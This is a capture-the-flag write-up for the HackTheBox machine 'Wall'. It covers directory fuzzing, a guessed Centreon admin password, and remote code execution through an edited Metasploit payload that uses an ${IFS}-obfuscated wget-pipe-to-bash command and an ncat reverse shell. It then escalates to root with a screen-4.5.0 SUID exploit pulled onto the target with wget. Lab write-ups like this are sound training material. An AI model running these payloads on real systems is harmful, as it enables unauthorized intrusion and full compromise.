Htb Wall Writeup

2 minute read

HackTheBox Wall writeup.

Overview

This is a writeup of the HackTheBox machine wall. OS : Linux IP : 10.10.10.157 Difficulty : Medium

Information Gathering

When we run an nmap scan on the machine we can see these results

Here we can see that both port 22 (SSH) and port 80 (HTTP) are open. When we go to the webpage on port 80 we can see the default apache webpage. The logical next step is to start fuzzing it. We can do this using dirsearch with the following command This script can be found at

  https://github.com/maurosoria/dirsearch

and can be run with the command

  python3 dirsearch.py -u http://10.10.10.157/ -e html

When we run this command we get a lot of results but not all of them are useful. There is a webpage called /monitoring which gives an admin log in page. There are a few things that can be tried at this stage

  • Check common usernames and passwords
  • Fuzz further with larger wordlists
  • Change the HTTP method from GET to POST

You can do this in multiple ways.

  • Tools like dirbuster or dirsearch
  • Burp Suite Repeater

Using burp suite we can intercept the traffic and see what happens when you change the GET to POST. Send a request to http://10.10.10.157/monitoring and you can see a redirect to a new page.

When we go to this new page we can see a centreon log in page. The first thing I did was to look attempt to research common credentials for the program as well as testing basic passwords. The next step would be to attempt to bruteforce it. Luckily I was able to guess the password (password1) so bruteforce was not necessary. When logged in you are brought to this new webpage.

Initial Foothold

Whilst browsing through the centreon application you will find an area where commands can be executed. This is found in Configuration > Commands > Checks. In addition you can also find a exploit for remote code execution on metasploit. This exploit however didnt work so I looked at the code to see how it can be changed. Within payload information we can see the line

  "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),

this can be changed to

  "nagios_bin": "wget${IFS}-qO-${IFS}http://10.10.xx.xx/a${IFS}|${IFS}bash;"

You can then run this exploit on one terminal whilst then using the command

  nc -lvnp <port

in another terminal to listen for the shell. If successful you should be left with a shell for the user www-data.

Getting User and Root

The first step is to do ls -la and you can see that there is another user called Shelby. This can be confirmed by doing cat /etc/passwd

If you check suid binaries you would find screen-4.5.0

The exploit script for this doesnt work out of the box so you need to compile them manually. When compiled they need to then be transfered to the victim machine.

This can be done over a python http server using the command

  python3 -m http.server

then on the victim machine as www-data you can wget the files and put them into the /tmp file as this location will be usable by www-data. You can wget the 2 files with the commands

  wget http://<LocalTunnelIP>:<port>/libhax.so

and

  wget http://<LocalTunnelIP>:<port>/rootshell

You can finally execute this file and you will get a root shell and therefore also the user.

Updated: